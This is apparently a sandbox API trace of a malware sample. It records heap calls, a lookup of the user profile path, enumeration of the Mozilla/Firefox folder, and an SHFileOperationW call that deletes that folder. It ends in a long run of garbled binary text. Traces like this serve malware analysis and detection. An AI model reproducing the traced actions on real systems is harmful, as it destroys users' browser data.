[0248.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0248.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0248.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0248.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0248.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0248.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0248.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0248.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0248.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0248.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0248.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0248.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0248.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0248.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0248.355] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0248.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0248.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0248.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0248.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0248.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0248.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0248.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0248.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0248.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0248.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0248.355] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0248.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0248.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0248.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa970 [0248.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0248.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0248.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa340 [0248.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0248.356] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0248.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0248.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0248.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0248.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0248.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0248.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0248.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0248.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0248.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0248.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0248.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0248.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0248.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0248.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0248.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0248.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0248.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24207f0 [0248.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0248.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0248.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0248.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0248.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0248.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0248.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0248.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0248.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0248.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x68) returned 0x2417000 [0248.357] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Mozilla", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla", lpFilePart=0x8bedfc*="Mozilla") returned 0x33 [0248.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2417000 | out: hHeap=0x25c0000) returned 1 [0248.357] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla")) returned 0x2010 [0248.358] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\*.*", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb7314c10, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb7314c10, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1173, dwReserved1=0x4, cFileName=".", cAlternateFileName="")) returned 0xaa5820 [0248.358] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb7314c10, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb7314c10, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1173, dwReserved1=0x4, cFileName="..", cAlternateFileName="")) returned 1 [0248.358] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1173, dwReserved1=0x4, cFileName="Firefox", cAlternateFileName="")) returned 1 [0248.358] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb7314c10, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb7314c10, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb7314c10, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1173, dwReserved1=0x4, cFileName="updates", cAlternateFileName="")) returned 1 [0248.358] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb7314c10, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb7314c10, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb7314c10, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1173, dwReserved1=0x4, cFileName="updates", cAlternateFileName="")) returned 0 [0248.358] FindClose (in: hFindFile=0xaa5820 | out: hFindFile=0xaa5820) returned 1 [0248.359] GetLastError () returned 0x12 [0248.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0248.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0248.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0248.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0248.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0248.359] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0248.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0248.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0248.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0248.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0248.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0248.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0248.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0248.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0248.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0248.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0248.360] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0248.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0248.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0248.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa340 [0248.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0248.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0248.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2e0 [0248.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0248.360] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0248.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0248.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0248.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0248.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0248.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0248.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0248.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0248.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0248.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0248.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0248.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0248.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0248.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0248.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0248.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0248.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0248.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24207f0 [0248.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0248.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0248.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0248.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0248.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0248.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0248.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0248.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0248.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0248.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0248.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0248.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0248.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0248.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0248.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0248.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0248.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0248.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0248.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0248.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0248.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x68) returned 0x2417000 [0248.362] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Mozilla", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla", lpFilePart=0x8bf658*="Mozilla") returned 0x33 [0248.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2417000 | out: hHeap=0x25c0000) returned 1 [0248.362] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla")) returned 0x2010 [0248.362] SHFileOperationW (in: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x702b\x7aad\x8736\xc90b\x59c3\x619\xf4e9\xd41c\x963b\xf069\xdc55\x3200\x5881\xd744\xc967\xb35c\x6943\x4b81\xc80e\x40a5\xe10c\xa05b\xd807\x3f7c\x3a2c\x3c79\xa3ff\x32ee\x77ce\xd5b8\xf71f\x4571\xa105\x197c\x589b\x20d8\x5647\xbc84\x22bb\xa638\x905\xe9e7\xc224\xa7d4\xe773\x7a1c\x98c8\x6db\x9315\x8076\xf631\xcb9f\x9711\xdaca\xb125\x83c2\xa7cc\xad9a\x3cd0\x27ee\x961a\xc100\x5050\xdb9c\xe6db\x824c\xd8fd\x2f5f\x4547\x59f5\xd417\xda5a\xfd97\x430e\xab4\xc043\x9b42\x7048\x838a\x2f05\xa3e7\x92e0\x1de3\xe2c8\xa7f5\x6c93\x2f01\x1aa4\xe893\xb676\xa41f\x3647\x979d\x73c4\xfb85\xeea0\x9832\x39d0\x5c0e\xbf72\xff66\x2a1a\x6bc5\xec11\x9e52\xa76\x85cc\xf9a8\x88d3\xaa8e\x78f0\xed31\x9d42\xf114\x3227\x7c79\x5c56\x8f7c\xfd1d\xe7d\x1f5c\x38a9\x877\x2da0\x69d\xef15\x7c0d\x780d\x9a2d\x5d9f\xee13\xcf8a\xa7f3\xde4c\x48c5\xd845\x1ebf\x3ad8\xcb01\x838a\x24cd\xd7a1\x85dc\x5b20\xf290\x1ba3\x36f8\xfd9a\xd9f6\x8f11\xcaa8\x6d17\x1338\x754f\xb8db\xf544\x11d6\x436e\x6946\x4b2a\x4a71\x938a\x9538\xb27e\xcce2\x2973\xfcfd\x84e\x2966\x54fd\x8417\x20f3\x290c\x2148\xf384\x3c20\xc217\x8a85\x8ab3\x671b\xa9fa\x2173\x780a\xd949\x117a\x562c\x5fa\x1a39\xcb05\x73d7\x43f3\xd432\x2035\x623f\x278c\